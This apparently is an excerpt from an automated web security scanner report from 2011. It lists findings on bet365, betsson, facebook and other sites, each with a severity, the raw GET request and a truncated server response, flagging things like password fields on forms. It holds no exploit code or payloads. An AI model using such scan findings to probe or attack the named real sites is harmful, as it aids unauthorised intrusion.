HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:31:25 GMT X-AspNet-Version: 2.0.50727 Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:25 GMT; path=/ Set-Cookie: ASP.NET_SessionId Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/ Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:25 GMT; path=/ Cache-Control: private Expires: Sat, 14 May 2011 12:31:25 GMT Content-Type: text/html; charset=utf-8 Content-Length: 65383 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_Html" xmlns="http://www.w3.org <head id=" ...[SNIP]... <div id="pageContainer" style="float:none;"> <form name="aspnetForm" method="post" action="/extra/en/mobile <div> ...[SNIP]... ssword", 2);" OnFocus="PasswordBeh ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bet365.com |
Path: | /extra/en/promotions |
GET /extra/en/promotions Host: www.bet365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:31:26 GMT X-AspNet-Version: 2.0.50727 Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:25 GMT; path=/ Set-Cookie: ASP.NET_SessionId Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/ Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:25 GMT; path=/ Cache-Control: private Expires: Sat, 14 May 2011 12:31:26 GMT Content-Type: text/html; charset=utf-8 Content-Length: 115152 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_Html" xmlns="http://www.w3.org <head id=" ...[SNIP]... <div id="pageContainer" style="float:none;"> <form name="aspnetForm" method="post" action="/extra/en <div> ...[SNIP]... ssword", 2);" OnFocus="PasswordBeh ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bet365.com |
Path: | /extra/en/promotions |
GET /extra/en/promotions Host: www.bet365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:31:24 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:24 GMT; path=/ Set-Cookie: ASP.NET_SessionId Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:24 GMT; path=/ Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:24 GMT; path=/ Cache-Control: private Expires: Sat, 14 May 2011 12:31:24 GMT Content-Type: text/html; charset=utf-8 Content-Length: 98594 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_Html" xmlns="http://www.w3.org <head id=" ...[SNIP]... <div id="pageContainer" style="float:none;"> <form name="aspnetForm" method="post" action="/extra/en <div> ...[SNIP]... ssword", 2);" OnFocus="PasswordBeh ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.bet365.com |
Path: | /extra/en/promotions |
GET /extra/en/promotions Host: www.bet365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: aps03=ct=198&lng=1; session=stk=F2905C3D |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:31:25 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: rmbs=2; expires=Wed, 16-Nov-2011 13:31:25 GMT; path=/ Set-Cookie: ASP.NET_SessionId Set-Cookie: lng=en-GB; expires=Tue, 15-May-2012 12:31:25 GMT; path=/ Set-Cookie: country=198; expires=Tue, 15-May-2012 12:31:25 GMT; path=/ Cache-Control: private Expires: Sat, 14 May 2011 12:31:25 GMT Content-Type: text/html; charset=utf-8 Content-Length: 113999 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html id="ctl00_Html" xmlns="http://www.w3.org <head id=" ...[SNIP]... <div id="pageContainer" style="float:none;"> <form name="aspnetForm" method="post" action="/extra/en <div> ...[SNIP]... ssword", 2);" OnFocus="PasswordBeh ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.crazyrewards |
Path: | / |
GET / HTTP/1.1 Host: www.crazyrewards.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Content-Type: text/html Last-Modified: Tue, 15 Mar 2011 14:28:31 GMT Accept-Ranges: bytes ETag: "c0c41421de3cb1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:20:05 GMT Connection: close Content-Length: 11218 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta name="robots" con ...[SNIP]... <div id="loginbox"> <form method="post" action="http://partners <table border="0" width="266" > ...[SNIP]... <input class="input-login" type="text" name="username" value="username" onfocus="if(this.value== <input class="input-login" type="password" name="password" value="password" onfocus="if(this.value== </td> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.facebook.com |
Path: | / |
GET / HTTP/1.1 Host: www.facebook.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private, no-cache, no-store, must-revalidate Expires: Sat, 01 Jan 2000 00:00:00 GMT P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p" Pragma: no-cache X-XSS-Protection: 0 Set-Cookie: datr=OxnRTfED2OUFMXx Set-Cookie: lsd=szS-2; path=/; domain=.facebook.com Set-Cookie: reg_fb_gate=http%3A%2F Set-Cookie: reg_fb_ref=http%3A%2F Content-Type: text/html; charset=utf-8 X-FB-Server: 10.54.116.65 Connection: close Date: Mon, 16 May 2011 12:31:55 GMT Content-Length: 29704 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){ ...[SNIP]... <div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.heavenaff |
Path: | / |
GET / HTTP/1.1 Host: www.heavenaffiliates.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:02:32 GMT Server: Apache FrontPage/5.0.2.2635 mod_bwlimited/1.4 mod_auth_passthrough/2.1 X-Powered-By: PHP/5.2.15 X-Pingback: http://www.heavenaff Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20304 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title> He ...[SNIP]... </h2> <form action="http://affiliates <fieldset> ...[SNIP]... </label> <input type="password" name="password" class="input" /> </p> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.postcodel |
Path: | /MyAccount.htm |
GET /MyAccount.htm HTTP/1.1 Host: www.postcodelottery.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=91262363 |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:22:36 GMT Server: Apache-Coyote/1.1 X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat Last-Modified: Mon, 16 May 2011 12:22:36 GMT Cache-Control: private, must-revalidate Expires: Wed, 16 Aug 2000 10:00:00 GMT Content-Type: text/html;charset=utf-8 Set-Cookie: BALANCEID=balancer.route1 Set-Cookie: BALANCEID=balancer.route1 Vary: Accept-Encoding Connection: close Content-Length: 16408 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <link rel="short ...[SNIP]... </script> <form action="/web/form" name="f91519f" id="f91519f" method="post" enctype="multipart/form ...[SNIP]... </label> <input type="password" class="text " id="password" name="f90908" size="20" maxlength="250" value="" /> </div> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.tstglobal.com |
Path: | / |
GET / HTTP/1.1 Host: www.tstglobal.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:32:05 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 16 May 2011 12:32:05 GMT Cache-Control: no-cache, must-revalidate Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10181 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... </h2> <form action="http://members <input type="hidden" name="Submit" value="1"> ...[SNIP]... </label> <input type="password" name="login-password" id="login-password" value="" /> <input type="image" src="/assets/images ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://bingo.betsson.com |
Path: | /en/ |
GET /en/ HTTP/1.1 Host: bingo.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:58:51 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:58:51 GMT; path=/ Set-Cookie: ASP.NET_SessionId X-AspNet-Version: 2.0.50727 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:58:51 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:58:51 GMT; path=/ Set-Cookie: ASP.NET_SessionId Set-Cookie: currentSite=1; path=/ Set-Cookie: lggdnstt=0; path=/ X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:58:51 GMT Connection: close Content-Length: 63913 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="head"> ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://help.betsson.com |
Path: | /display/4/kb/faq/index |
GET /display/4/kb/faq/index Host: help.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Found Connection: close Date: Mon, 16 May 2011 12:02:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Location: /index.aspx Set-Cookie: ASP.NET_SessionId Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 128 <html><head><title>Object moved</title></head><body <h2>Object moved to <a href='/index.aspx'>here< </body></html> |
Severity: | Medium |
Confidence: | Firm |
Host: | https://members.bet365 |
Path: | /members/chat/ |
GET /members/chat/ HTTP/1.1 Host: members.bet365.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 12:34:01 GMT X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache p3p: CP="CAO PSA OUR" p3p: CP="CAO PSA OUR" Set-Cookie: session=processform=0&stk Set-Cookie: stk=3E2ADB785CD34600 Set-Cookie: aps03=lng=1&tzi=1; expires=Sun, 16-May-2021 12:34:01 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 16269 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><title> bet365 </ ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://poker.betsson.com |
Path: | /en/ |
GET /en/ HTTP/1.1 Host: poker.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-cache, no-store Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Set-Cookie: lggdnstt=0; path=/ X-Powered-By: ASP.NET Date: Mon, 16 May 2011 12:13:27 GMT Connection: close Content-Length: 39393 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="head"> ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://scratch.betsson |
Path: | /en/ |
GET /en/?navbar=true HTTP/1.1 Host: scratch.betsson.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:45:00 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:45:00 GMT; path=/ Set-Cookie: ASP.NET_SessionId X-AspNet-Version: 2.0.50727 Set-Cookie: language=en; expires=Wed, 16-May-2012 11:45:00 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 11:45:00 GMT; path=/ Set-Cookie: ASP.NET_SessionId Set-Cookie: lggdnstt=0; path=/ X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:45:00 GMT Content-Length: 160229 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="head"> ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://secure.neogames |
Path: | /ScratchCards/Lobby.aspx |
GET /ScratchCards/Lobby.aspx HTTP/1.1 Host: secure.neogames-tech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 16 May 2011 12:31:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 19307 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <title> </title> <meta name="GENERATOR" content="Microsoft Visual Studio .NET 7.1" /> <meta name="ProgId" ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.betsson.com |
Path: | /en/about/ |
GET /en/about/ HTTP/1.1 Host: www.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 301 Moved Permanently Cache-Control: private Content-Length: 0 Content-Type: text/html Location: http://about.betsson.com Server: Microsoft-IIS/7.5 Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/ Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/ Set-Cookie: ASPSESSIONIDAQQDRSDT X-Powered-By: ASP.NET p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Date: Mon, 16 May 2011 12:08:43 GMT Connection: close Set-Cookie: BIGipServerwww.betsson |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.betsson.com |
Path: | /en/about/company |
GET /en/about/company Host: www.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 301 Moved Permanently Cache-Control: private Content-Length: 0 Content-Type: text/html Location: http://about.betsson.com Server: Microsoft-IIS/7.5 Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/ Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/ Set-Cookie: ASPSESSIONIDAASDBABS X-Powered-By: ASP.NET p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Date: Mon, 16 May 2011 12:08:49 GMT Connection: close Set-Cookie: BIGipServerwww.betsson |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.betsson.com |
Path: | /en/customer-service/ |
GET /en/customer-service/ HTTP/1.1 Host: www.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 23563 Content-Type: text/html; Charset=UTF-8 Server: Microsoft-IIS/7.5 Set-Cookie: lggdnstt=0; path=/ Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/ Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/ Set-Cookie: ASPSESSIONIDAASDBABS X-Powered-By: ASP.NET p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Date: Mon, 16 May 2011 12:08:39 GMT Connection: close Set-Cookie: BIGipServerwww.betsson Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http- ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.betsson.com |
Path: | /en/customer-service |
GET /en/customer-service Host: www.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 13183 Content-Type: text/html; Charset=UTF-8 Server: Microsoft-IIS/7.5 Set-Cookie: lggdnstt=0; path=/ Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/ Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/ Set-Cookie: ASPSESSIONIDAQQDRSDT X-Powered-By: ASP.NET p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Date: Mon, 16 May 2011 12:08:39 GMT Connection: close Set-Cookie: BIGipServerwww.betsson Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http- ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.betsson.com |
Path: | /en/customer-service |
GET /en/customer-service Host: www.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16611 Content-Type: text/html; Charset=UTF-8 Server: Microsoft-IIS/7.5 Set-Cookie: lggdnstt=0; path=/ Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/ Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/ Set-Cookie: ASPSESSIONIDAASDBABS X-Powered-By: ASP.NET p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Date: Mon, 16 May 2011 12:08:41 GMT Connection: close Set-Cookie: BIGipServerwww.betsson Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.betsson.com |
Path: | /en/customer-service |
GET /en/customer-service Host: www.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 16796 Content-Type: text/html; Charset=UTF-8 Server: Microsoft-IIS/7.5 Set-Cookie: lggdnstt=0; path=/ Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/ Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/ Set-Cookie: ASPSESSIONIDAASDBABS X-Powered-By: ASP.NET p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Date: Mon, 16 May 2011 12:08:40 GMT Connection: close Set-Cookie: BIGipServerwww.betsson Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.betsson.com |
Path: | /en/customer-service |
GET /en/customer-service Host: www.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 68223 Content-Type: text/html; Charset=UTF-8 Server: Microsoft-IIS/7.5 Set-Cookie: lggdnstt=0; path=/ Set-Cookie: section=customer; expires=Mon, 14-May-2012 23:00:00 GMT; path=/en Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/ Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/ Set-Cookie: ASPSESSIONIDAASDBABS X-Powered-By: ASP.NET p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Date: Mon, 16 May 2011 12:08:41 GMT Connection: close Set-Cookie: BIGipServerwww.betsson Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta ht ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.betsson.com |
Path: | /en/my-account/refer-a |
GET /en/my-account/refer-a Host: www.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 302 Object moved Cache-Control: private Content-Length: 187 Content-Type: text/html; Charset=UTF-8 Location: /en/need-login.asp Server: Microsoft-IIS/7.5 Set-Cookie: language=en; expires=Tue, 15-May-2012 23:00:00 GMT; path=/ Set-Cookie: site=en; expires=Tue, 15-May-2012 23:00:00 GMT; domain=.betsson.com; path=/ Set-Cookie: ASPSESSIONIDAQQDRSDT X-Powered-By: ASP.NET p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Date: Mon, 16 May 2011 12:08:49 GMT Connection: close Set-Cookie: BIGipServerwww.betsson <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="/en/need-login.asp |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.betsson.com |
Path: | /my-account/refer-a |
GET /my-account/refer-a Host: www.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private Content-Length: 23633 Content-Type: text/html Server: Microsoft-IIS/7.5 Set-Cookie: ASPSESSIONIDAQQDRSDT X-Powered-By: ASP.NET p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Date: Mon, 16 May 2011 12:09:12 GMT Connection: close Set-Cookie: BIGipServerwww.betsson Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta htt ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.betsson.com |
Path: | /web/en/sportsbook/ |
GET /web/en/sportsbook/ HTTP/1.1 Host: www.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 78630 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: language=en; expires=Wed, 16-May-2012 12:08:59 GMT; path=/ Set-Cookie: site=en; domain=.betsson.com; expires=Wed, 16-May-2012 12:08:59 GMT; path=/ Set-Cookie: ASP.NET_SessionId Set-Cookie: lggdnstt=0; path=/ X-UA-Compatible: IE=EmulateIE8 Date: Mon, 16 May 2011 12:08:59 GMT Connection: close Set-Cookie: BIGipServerwww.betsson Vary: Accept-Encoding <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id="head"> ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | https://www.interwetten |
Path: | /en/Default.aspx |
GET /en/Default.aspx HTTP/1.1 Host: www.interwetten.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BIGipServerPool_Web01 |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 Set-Cookie: ASP.NET_SessionId X-AspNet-Version: 4.0.30319 Set-Cookie: ASP.NET_SessionId Set-Cookie: __IW_COOKIE_CULTURE=en; expires=Sun, 16-May-2021 11:44:27 GMT; path=/ X-Powered-By: ASP.NET Date: Mon, 16 May 2011 11:44:27 GMT Vary: Accept-Encoding Connection: Keep-Alive Content-Length: 33754 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <hea ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.betsson.com |
Path: | /core/StartPlaying/Api |
GET /core/StartPlaying/Api Host: www.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Cache-Control: private, no-store Content-Type: text/javascript; charset=utf-8 Expires: Mon, 01 Jan 0001 00:00:00 GMT Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Date: Mon, 16 May 2011 12:08:35 GMT Connection: close Content-Length: 1480 Set-Cookie: BIGipServerwww.betsson Vary: Accept-Encoding /* current StartPlaying.Web version: 1.3 */ if(typeof(Betsson { Betsson_StartPlaying ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.betsson.com |
Path: | /core/StartPlaying |
GET /core/StartPlaying Host: www.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Wed, 30 Mar 2011 09:14:03 GMT Accept-Ranges: bytes ETag: "c2a920d0baeecb1:0" Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Date: Mon, 16 May 2011 12:08:34 GMT Connection: close Content-Length: 4941 Set-Cookie: BIGipServerwww.betsson Vary: Accept-Encoding var Betsson_StartPlaying= ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.betsson.com |
Path: | /start/en/ |
GET /start/en/ HTTP/1.1 Host: www.betsson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
